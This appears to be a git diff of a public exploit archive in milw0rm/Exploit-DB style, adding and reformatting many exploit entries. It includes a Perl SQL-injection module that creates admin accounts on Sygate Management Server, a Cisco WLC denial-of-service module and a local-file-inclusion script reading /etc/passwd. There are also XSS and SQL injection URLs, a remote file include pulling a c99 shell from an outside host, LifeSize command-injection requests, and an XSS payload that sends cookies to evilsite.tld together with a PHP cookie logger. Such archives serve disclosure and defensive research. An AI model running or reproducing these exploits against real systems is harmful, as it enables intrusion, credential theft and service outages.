payload : Create a valid admin account directly in the database +# +# Editor status : Official patch available +# http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html +# +## + +package Msf::Exploit::sygate_policy_manager; +use base "Msf::Exploit"; +use strict; +use Pex::Text; +use bytes; +use vars qw{$HAS_SHA1}; + +BEGIN +{ + $HAS_SHA1 = 0; + + if (eval('require Digest::SHA1')) { + eval('use Digest::SHA1 qw(sha1);'); + $HAS_SHA1 = 1; + } +} + +my $advanced = { }; + +my $info = { + 'Name' => 'Sygate Management Server SQL Injection', + 'Version' => '$Revision: 1.3 $', + 'Authors' => [ 'Nicob ' ], + 'Arch' => [ 'x86' ], + 'OS' => [ 'win32' ], + 'Priv' => 0, + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 80], + 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], + 'LOGIN' => [0, 'LOGIN', 'The username to create/modify', 'reporting'], + 'PASSWD' => [0, 'PASSWD', 'The encrypted password of this user', 'my_passwd'], + 'SERVLET' => [1, 'DATA', 'Full path of the servlet', '/servlet/Sygate.Servlet.login'], + 'SSL' => [0, 'BOOL', 'Use SSL'], + }, + + 'Description' => Pex::Text::Freeform(qq{ + This module exploits a non authenticated SQL-Injection vulnerability in the + Sygate Management Server (now Symantec Policy Manager), in order to create a new + admin account or change the password of an existing one. Version 4.1 is known to be vulnerable. + Version 5 is not vulnerable. +}), + + 'Refs' => + [ + ['URL', 'http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html'], + ['CVE', '2006-0522'], + ['OSVDB', '22883'], + ['BID', '16452'], + ], + + 'Targets' => + [ + ['Change a specific users password', 'change_user_passwd'], + ['Create a new administrative account', 'add_account'], + ['Reset all passwords (denial of service)', 'reset_all'], + ], + + 'DefaultTarget' => 0, + + 'Keys' => ['sygate'], + + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Check { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $vhost = $self->VHost; + my $target_port = $self->GetVar('RPORT'); + my $servlet = $self->GetVar('SERVLET'); + + my $request = + "GET $servlet?uid=test1&up=test2 HTTP/1.1\r\n". + "Accept: */*\r\n". + "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". + "Host: $vhost:$target_port\r\n". + "Connection: Close\r\n". + "\r\n"; + + my $s = Msf::Socket::Tcp->new( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'SSL' => $self->GetVar('SSL'), + ); + + if ($s->IsError){ + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return $self->CheckCode('Connect'); + } + + $self->PrintLine("[*] Establishing a connection to the target..."); + + $s->Send($request); + my $results = $s->Recv(-1, 20); + $s->Close(); + + if ($results =~ /HTTP\/1\..\s+200/) { + + $self->PrintLine("[*] Vulnerable server detected!"); + return $self->CheckCode('Confirmed'); + + } elsif ($results =~ /HTTP\/1\..\s+([345]\d+)/) { + + $self->PrintLine("[*] The Sygate Policy Manager servlet was not found."); + return $self->CheckCode('Safe'); + } + + $self->PrintLine("[*] Generic error..."); + return $self->CheckCode('Generic'); +} + +sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $vhost = $self->VHost; + my $target_port = $self->GetVar('RPORT'); + my $servlet = $self->GetVar('SERVLET'); + my $login = $self->GetVar('LOGIN'); + my $passwd = $self->GetVar('PASSWD'); + my $target = $self->Targets->[$self->GetVar('TARGET')]; + + if (! $HAS_SHA1) { + $self->PrintLine("[*] Please install the Digest-SHA1 module to use this exploit"); + return; + } + + # The 'Password' field is a hex-encoded SHA-1 digest of the "user+password" string + my $sha1 = sha1($login.$passwd); + $sha1 =~ s/./sprintf("%02x", ord($&))/ges; + $sha1 = "0x".uc($sha1); + + # Maximum level of privileges + my $privs = "255"; + + + my %sqlpayloads = + ( + # Create a new valid admin account (in SMS v4.1) -- [BUG] : Can't access the Users panel :-( + 'add_account' => + "insert into CMS35.Admin (RecUpdateTime,LoginName,AdminNickName,Password,AdminRights,". + "AdminEmail,FailedLogin,AlertOnFailure,AlertFailureThreshold,OnlineState) ". + "values (getutcdate(),'$login','$login',$sha1,'$privs','',0,0,0,0)", + + # Reset the password of every account to "0x4141" (in SMS v4.1) -- Denial of Service only ! + 'reset_all' => + "update CMS35.Admin set Password=cast('AA' as varbinary)", + + # Change the password of the selected account (in SMS v4.1) -- Yeah, full access to 'admin' ! + 'change_user_passwd' => + "update CMS35.Admin set Password=$sha1 where LoginName='$login'", + ); + + my $payload = $sqlpayloads{ $target->[1] }; + + # Inject our payload + $servlet = $servlet."?uid=".$self->URLEncode("';$payload -- ")."&up=foo"; + + my $request = + "GET $servlet HTTP/1.1\r\n". + "Accept: */*\r\n". + "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". + "Host: $vhost:$target_port\r\n". + "Connection: Close\r\n". + "\r\n"; + + my $s = Msf::Socket::Tcp->new( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'SSL' => $self->GetVar('SSL'), + ); + + if ($s->IsError){ + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + + $self->PrintLine("[*] Establishing a connection to the target..."); + $self->PrintLine(' '); + $s->Send($request); + my $results = $s->Recv(-1, 20); + + if ($results =~ /HTTP\/1\.. 200 OK/im) { + # Seems to be fine ;-) + $self->PrintLine("OK. Now try to log with user '$login' and passwd '$passwd'"); + } else { + $self->PrintLine("Doh ! Are you sure this server is vulnerable ?"); + } + + $s->Close(); + return; +} + +sub URLEncode { + my $self = shift; + my $data = shift; + my $res; + + foreach my $c (unpack('C*', $data)) { + if ( + ($c >= 0x30 && $c <= 0x39) || + ($c >= 0x41 && $c <= 0x5A) || + ($c >= 0x61 && $c <= 0x7A) + ) { + $res .= chr($c); + } else { + $res .= sprintf("%%%.2x", $c); + } + } + return $res; +} + +sub VHost { + my $self = shift; + my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST'); + return $name; +} + +1; + +# milw0rm.com [2006-04-15] diff --git a/platforms/cgi/webapps/32430.txt b/platforms/cgi/webapps/32430.txt new file mode 100755 index 000000000..4e01b033d --- /dev/null +++ b/platforms/cgi/webapps/32430.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31436/info + +WhoDomLite is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +WhoDomLite 1.1.3 is vulnerable; other versions may also be affected. + +http://www.example.com/wholite.cgi?dom= xss_code &tld=com&action=search \ No newline at end of file diff --git a/platforms/hardware/dos/9268.rb b/platforms/hardware/dos/9268.rb index 0166e7df1..6b4cdcd8e 100755 --- a/platforms/hardware/dos/9268.rb +++ b/platforms/hardware/dos/9268.rb @@ -1,52 +1,52 @@ -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Remote::Tcp - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Cisco WLC 4200 Basic Auth Denial of Service', - 'Description' => %q{ - - This module triggers a Denial of Service condition in the Cisco WLC 4200 - HTTP server. By sending a GET request with long authentication data, the - device becomes unresponsive and reboots. Firmware is reportedly vulnerable. - }, - 'Author' => [ 'Christoph Bott ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 5949 $', - 'References' => - [ - [ 'BID', '???'], - [ 'CVE', '???'], - [ 'URL', 'http://www.cisco.com/?????'], - ], - 'DisclosureDate' => 'January 26 2009')) - - register_options( - [ - Opt::RPORT(80), - ], self.class) - - end - - def run - connect - - print_status("Sending HTTP DoS packet") - - sploit = - "GET /screens/frameset.html HTTP/1.0\r\n" + - "Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0" - - sock.put(sploit + "\r\n") - - disconnect - end - -end - -# milw0rm.com [2009-07-27] +require 'msf/core' + + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Cisco WLC 4200 Basic Auth Denial of Service', + 'Description' => %q{ + + This module triggers a Denial of Service condition in the Cisco WLC 4200 + HTTP server. By sending a GET request with long authentication data, the + device becomes unresponsive and reboots. Firmware is reportedly vulnerable. + }, + 'Author' => [ 'Christoph Bott ' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 5949 $', + 'References' => + [ + [ 'BID', '???'], + [ 'CVE', '???'], + [ 'URL', 'http://www.cisco.com/?????'], + ], + 'DisclosureDate' => 'January 26 2009')) + + register_options( + [ + Opt::RPORT(80), + ], self.class) + + end + + def run + connect + + print_status("Sending HTTP DoS packet") + + sploit = + "GET /screens/frameset.html HTTP/1.0\r\n" + + "Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0" + + sock.put(sploit + "\r\n") + + disconnect + end + +end + +# milw0rm.com [2009-07-27] diff --git a/platforms/jsp/webapps/32423.txt b/platforms/jsp/webapps/32423.txt new file mode 100755 index 000000000..1fd21e44e --- /dev/null +++ b/platforms/jsp/webapps/32423.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31410/info + +OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Versions prior to OpenNMS 1.5.94 are vulnerable. + +http://www.example.com/opennms/j_acegi_security_check?j_username=test'>&j_password=test \ No newline at end of file diff --git a/platforms/jsp/webapps/32424.txt b/platforms/jsp/webapps/32424.txt new file mode 100755 index 000000000..0ad5f9f64 --- /dev/null +++ b/platforms/jsp/webapps/32424.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31410/info + +OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Versions prior to OpenNMS 1.5.94 are vulnerable. + +http://www.example.com/opennms/notification/list.jsp?username=%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/jsp/webapps/32425.txt b/platforms/jsp/webapps/32425.txt new file mode 100755 index 000000000..23dd1ec9a --- /dev/null +++ b/platforms/jsp/webapps/32425.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31410/info + +OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Versions prior to OpenNMS 1.5.94 are vulnerable. + +http://www.example.com/opennms/event/list?sortby=id&limit=10&filter=msgsub%3D%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E&filter=iplike%3D*.*.*.* \ No newline at end of file diff --git a/platforms/php/webapps/32418.txt b/platforms/php/webapps/32418.txt new file mode 100755 index 000000000..c481acf45 --- /dev/null +++ b/platforms/php/webapps/32418.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/31401/info + +EasyRealtorPRO is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type&search_ordermethod=asc&page=2&item=5'SQL INJECTION + +http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type&search_ordermethod=asc'SQL INJECTION&page=2&item=5 + +http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type'SQL INJECTION&search_ordermethod=asc&page=2&item=5 diff --git a/platforms/php/webapps/32419.pl b/platforms/php/webapps/32419.pl new file mode 100755 index 000000000..a8e5ae8d1 --- /dev/null +++ b/platforms/php/webapps/32419.pl @@ -0,0 +1,101 @@ +source: http://www.securityfocus.com/bid/31403/info + +Libra File Manager is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks. + +Libra File Manager 2.0 and prior versions are available. + +#! /usr/bin/perl + +# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +# Libra PHP File Manager <= 1.18 / Local File Inclusion Vulnerability +# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +# Program: Libra PHP File Manager +# Version: <= 1.18 +# File affected: fileadmin.php +# Download: http://file.sourceforge.net +# +# +# Found by Pepelux +# eNYe-Sec - www.enye-sec.org +# Greetings to Ka0x for help me with the perl code :) +# +# You can scale directories and read any file that you have permissions + +use LWP::UserAgent; +$ua = LWP::UserAgent->new; + +print "\e[2J"; +system(($^O eq 'MSWin32') ? 'cls' : 'clear'); + +my ($host, $path, $action) = @ARGV ; + +unless($ARGV[2]) { + print "Usage: perl $0 \n"; + print "\tex: perl $0 http://www.example.com /etc/ list\n"; + print "\tex: perl $0 http://www.example.com /etc/passwd edit\n"; + print "Actions:\n"; + print " list:\n"; + print " edit:\n\n"; + exit 1; +} + +$ua->agent("$0/0.1 " . $ua->agent); +$host = "http://".$host if ($host !~ /^http:/); +$path = $path."/" if ($action eq "list" && $path !~ /\/$/); +$op = "home" if ($action == "list"); + +if ($action eq "edit") { + $aux = $path; + $directory = ""; + + do { + $x = index($aux, "/"); + $y = length($aux) - $x; + $directory .= substr($aux, 0, $x+1); + $aux = substr($aux, $x+1, $y); + } until ($x == -1); + + $path = $directory; + $file = $aux; + $op = "edit"; +} + +$url = $host."/fileadmin.php?user=root&isadmin=yes&op=".$op."&folder=".$path; +$url .= "&fename=".$file if ($action eq "edit"); + +$req = HTTP::Request->new(GET => $url); +$req->header('Accept' => 'text/html'); + +$res = $ua->request($req); + +if ($res->is_success) { + $result = $res->content; + + if ($action eq "edit") { + print "Viewing $path$file:\n"; + print $1,"\n" if($result =~ /name="ncontent">(.*)<\/textarea>/s); + } + else { + print "Files in $path:\n"; + $x = index($result, "Files:") + 6; + $result = substr($result, $x, length($result)-$x); + $result =~ s/<[^>]*>//g; + $result =~ s/Filename//g; + $result =~ s/Size//g; + $result =~ s/Edit//g; + $result =~ s/Rename//g; + $result =~ s/Delete//g; + $result =~ s/Move//g; + $result =~ s/View//g; + $result =~ s/Open//g; + $result =~ s/\d*//g; + $result =~ s/\s+/\n/g; + $x = index($result, "Copyright"); + $result = substr($result, 0, $x); + print $result; + } +} +else { print "Error: " . $res->status_line . "\n";} diff --git a/platforms/php/webapps/32421.html b/platforms/php/webapps/32421.html new file mode 100755 index 000000000..02f136a64 --- /dev/null +++ b/platforms/php/webapps/32421.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31407/info + +FlatPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Versions prior to FlatPress 0.804.1 are vulnerable. + +
\ No newline at end of file diff --git a/platforms/php/webapps/32422.txt b/platforms/php/webapps/32422.txt new file mode 100755 index 000000000..f5b1aa5c3 --- /dev/null +++ b/platforms/php/webapps/32422.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/31408/info + +Vikingboard is prone to an unauthorized-access vulnerability. + +Successfully exploiting this issue can allow attackers to register and log in as existing users. + +Vikingboard 0.2 Beta is vulnerable; other versions may also be affected. + +The following example account registration data is available: + +Username: [username][whitespace characters]NULL +Password: [password] +E-Mail: [E-Mail] \ No newline at end of file diff --git a/platforms/php/webapps/32427.txt b/platforms/php/webapps/32427.txt new file mode 100755 index 000000000..6407c270d --- /dev/null +++ b/platforms/php/webapps/32427.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31419/info + +Barcode Generator is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. + +Barcode Generator 2.0 is vulnerable; other versions may also be affected. + +http://www.example.com/barcodegen.1d-php4.v2.0.0/class/LSTable.php?class_dir=http://example2.com/shell/c99.txt? \ No newline at end of file diff --git a/platforms/php/webapps/32431.txt b/platforms/php/webapps/32431.txt new file mode 100755 index 000000000..bde34f0ba --- /dev/null +++ b/platforms/php/webapps/32431.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31437/info + +Lyrics Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/search_results.php?k= XSS_CODE \ No newline at end of file diff --git a/platforms/php/webapps/32432.txt b/platforms/php/webapps/32432.txt new file mode 100755 index 000000000..63ca95f60 --- /dev/null +++ b/platforms/php/webapps/32432.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/31438/info + +Clickbank Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +The following example is available: + +http://www.example.com/search.php +in search box code Xss \ No newline at end of file diff --git a/platforms/php/webapps/32433.txt b/platforms/php/webapps/32433.txt new file mode 100755 index 000000000..3f081d7ac --- /dev/null +++ b/platforms/php/webapps/32433.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/31441/info + +Membership Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/stuffs.php?category= XSS_CODE + +http://www.example.com/search.php +in search box code Xss \ No newline at end of file diff --git a/platforms/php/webapps/32434.txt b/platforms/php/webapps/32434.txt new file mode 100755 index 000000000..c913a470a --- /dev/null +++ b/platforms/php/webapps/32434.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31442/info + +Recipe Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/search.php?keyword= XSS_HACKING \ No newline at end of file diff --git a/platforms/php/webapps/32437.txt b/platforms/php/webapps/32437.txt new file mode 100755 index 000000000..877ffa939 --- /dev/null +++ b/platforms/php/webapps/32437.txt @@ -0,0 +1,82 @@ +LifeSize UVC 1.2.6 authenticated vulnerabilities + +RCE as www-data: + +POST /server-admin/operations/diagnose/ping/ HTTP/1.1 +Host: 172.31.16.99 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://172.31.16.99/server-admin/operations/diagnose/ping/ +Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 118 + +csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=goo`whoami`gle.com + +The above POST results in a response containing: +ping: unknown host goowww-datagle.com
+ + + + + +RCE as www-data: + +POST /server-admin/operations/diagnose/trace/ HTTP/1.1 +Host: 172.31.16.99 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://172.31.16.99/server-admin/operations/diagnose/trace/ +Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 101 + +csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com + +Results in the following error: +gowww-dataogle.com: Name or service not known + + + + + + +RCE as www-data: + +POST /server-admin/operations/diagnose/dns/ HTTP/1.1 +Host: 172.31.16.99 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://172.31.16.99/server-admin/operations/diagnose/dns/ +Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 116 + +csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com&query_type=ANY + +Results in the following results: +; <<>> DiG 9.7.0-P1 <<>> -t ANY gowww-dataogle.com -b 172.31.16.99 +;; global options: +cmd +;; Got answer: +;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54663 +;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0 + +;; QUESTION SECTION: +;gowww-dataogle.com. IN ANY + +;; AUTHORITY SECTION: +com. 890 IN SOA a.gtld-servers.net. nstld.verisign-grs.com. 1395411948 1800 900 604800 86400 + +;; Query time: 21 msec +;; SERVER: 8.8.8.8#53(8.8.8.8) +;; WHEN: Fri Mar 21 10:26:21 2014 +;; MSG SIZE rcvd: 109 \ No newline at end of file diff --git a/platforms/php/webapps/5762.txt b/platforms/php/webapps/5762.txt index 4d04c8c65..fc7cad67e 100755 --- a/platforms/php/webapps/5762.txt +++ b/platforms/php/webapps/5762.txt @@ -1,19 +1,19 @@ --------------------------------------- -Pro Manager 0.73 Local File Inclusion Vuln --------------------------------------- -http://www.sfr-fresh.com/unix/privat/proManager-0.73.tar.gz --------------------------------------- -By : Stack - -email : Wanted --------------------------------------- -Exploit : -http://localhost/path/inc/config.php?language=../../../../[without php extention] -http://localhost/path/inc/config.php?language=../../../../etc/passwd%00 --------------------------------------- -thnx allah -Greats to all arabians haxors :d -D-S.Morocco Is The Best :d -Waiting - -# milw0rm.com [2008-06-09] +-------------------------------------- +Pro Manager 0.73 Local File Inclusion Vuln +-------------------------------------- +http://www.sfr-fresh.com/unix/privat/proManager-0.73.tar.gz +-------------------------------------- +By : Stack + +email : Wanted +-------------------------------------- +Exploit : +http://localhost/path/inc/config.php?language=../../../../[without php extention] +http://localhost/path/inc/config.php?language=../../../../etc/passwd%00 +-------------------------------------- +thnx allah +Greats to all arabians haxors :d +D-S.Morocco Is The Best :d +Waiting + +# milw0rm.com [2008-06-09] diff --git a/platforms/php/webapps/8820.txt b/platforms/php/webapps/8820.txt index 7ddde905e..c340b882c 100755 --- a/platforms/php/webapps/8820.txt +++ b/platforms/php/webapps/8820.txt @@ -1,216 +1,216 @@ -AMember - Multiple Vulnerabilities - -Version Affected: 3.1.7 (Apr-10-2009) (newest) - -Info: aMember is a flexible membership and subscription management PHP script. It has support for -PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling, -Multicards, E-Gold and Clickbank payment systems (see list of integrated payment systems) and -allows you to setup paid-membership areas on your site. It can also be used without any payment -system - you can manage users manually. - -aMember Pro also supports integration plugins to link users database with third-party scripts, -for example vBulletin, Joomla, WordPress (see list of integration plugins). -aMember is a perfect membership software for selling digital subscriptions and downloads. - -Opinion: CGI Systems' website has an XSS issue too, they obviously don't realise the impact of XSS. - -Credits: Matt, fiftysixer, mind_warlock, fourthdimension, NetRolller3D, ha.ckers, webDEViL and all of InterN0T :) - -Accurate Googled0rk: (fewer results) -http://lmgtfy.com/?q=inurl:/amember intext:© CGI-Central.NET, 2002-2006 - -Inaccurate Googled0rk: (more results) -http://lmgtfy.com/?q=intext:© CGI-Central.NET, 2002-2006 - -External Links: -http://www.amember.com/ -http://www.amember.com/p/Main/Download -http://www.amember.com/p/Main/Demo - - --:: The Advisory ::- - -Version Information: -http://www.website.tld/amember/docs/changelog.txt - -Information Disclosure: -http://www.website.tld/amember/docs/tester.php -http://www.website.tld/amember/setup.php?step=' -http://www.website.tld/amember/admin/report.php?report=' (admin only) -- More files are affected. (discloses full path to the file) - -Cross Site Scripting (admin only - might not survive a login screen!) -http://www.website.tld/amember/admin/users.php?letter="> -http://www.website.tld/amember/admin/users.php?status="> -http://www.website.tld/amember/admin/users.php?letter="> -http://www.website.tld/amember/admin/users.php?action= -http://www.website.tld/amember/admin/setup.php?notebook= -http://www.website.tld/amember/admin/newsletter_threads.php?action=edit&thread_id="> -http://www.website.tld/amember/admin/newsletter_guests.php?action=edit&guest_id="> -http://www.website.tld/amember/admin/products.php?action= -http://www.website.tld/amember/admin/protect.php?action= -http://www.website.tld/amember/admin/coupons.php?action= -http://www.website.tld/amember/admin/aff_banners.php?action=edit_banner&banner_id="> -http://www.website.tld/amember/admin/aff_banners.php?action=edit_link&banner_id="> -http://www.website.tld/amember/admin/email_templates.php?a=edit&tpl= -http://www.website.tld/amember/aff.php?action= (this might only affect attacker) -- More files might be affected. - -HTML Injection: (insert: "> into the mentioned forms) -http://www.website.tld/amember/signup.php (first- and last-name) -http://www.website.tld/amember/aff_signup.php (first- and last-name) -http://www.website.tld/amember/profile.php (first- and last-name) - -HTML Injection Exception: (this injection might only be possible to be seen by the attacker) -http://www.website.tld/amember/aff.php?action=payout_info (other payment plugins might be vulnerable too) - -Affeced Sites (by HTML Injection): -http://www.website.tld/amember/admin/index.php (if the menu user-lookup returns positive) -http://www.website.tld/amember/admin/users.php?q=VALIDUSERNAME&q_where=anywhere&action=search_by_string -http://www.website.tld/amember/admin/users.php?status= (this will always return the HTML Injection) -http://www.website.tld/amember/admin/users.php?action=edit&member_id=VALIDUSERID -http://www.website.tld/amember/admin/users.php?action=actions&member_id=VALIDUSERID -http://www.website.tld/amember/admin/users.php?action=edit_payment&payment_id=VALIDPAYMENTID&member_id=VALIDUSERID -http://www.website.tld/amember/admin/users.php?letter=FIRSTLETTEROFYOURUSERNAME --- More files might be affected. - -SQL Injection: (requires admin access) -http://www.website.tld/amember/admin/access_log.php?order1='SQL'a.time+DESC&order2='SQL'a.time+DESC -http://www.website.tld/amember/admin/aff_clicks.php?year_month='SQL'&action=aff_sales -http://www.website.tld/amember/admin/products.php?action=delete&product_id='SQL' --- More files might be affected, the depth of SQL Injection was not checked! - - --:: Solution ::- -All the files are encrypted according to CGI Systems' website. - -Questions and answers (quote) - -I've downloaded aMember, but the source code is corrupted. How can I download it again ? -The source code is not corrupted, but it is encrypted with Zend Encoder or IonCube Encoder technology - -Which essentially mean i was unable to find any solution to the problem. -I believe this vulnerability might be exploited in the wild due to it is very -easy to find and take advantage of. (if you know what you're looking for) - -Addition: The most easy solution would be to use a regular expression to fix this issue. - - --:: Ways of abusing the HTML Injection and XSS ::- -The following are examples of what you can input as first- and/or last-name: -"> tag at the end. However, this is -especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is -valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag. - -Firstname: "> document.location=%22http://evilsite.tld/cookiestealer.php?cookie=%22 %2B document.cookie; -- The reason why "browser-hex" is used is because the above would else issue an error and thereby not work. --- Reference about url encoding: http://www.blooberry.com/indexdot/html/topics/urlencoding.htm - -CookieLogger: -"); -else -fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); -fclose($log); -} - 